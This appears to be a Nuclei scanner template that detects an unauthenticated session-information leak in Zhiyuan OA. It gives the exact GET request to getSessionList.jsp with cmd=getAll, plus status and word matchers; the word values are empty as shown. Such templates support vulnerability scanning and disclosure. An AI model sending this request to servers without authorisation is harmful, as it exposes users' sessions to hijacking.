id: zhiyuan-oa-session-leak info: name: Zhiyuan OA Session Leak author: pikpikcu severity: medium description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint. reference: https://www.zhihuifly.com/t/topic/3345 tags: zhiyuan,leak,disclosure requests: - method: GET path: - "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll" matchers-condition: and matchers: - type: word words: - "" - "" condition: and - type: status status: - 200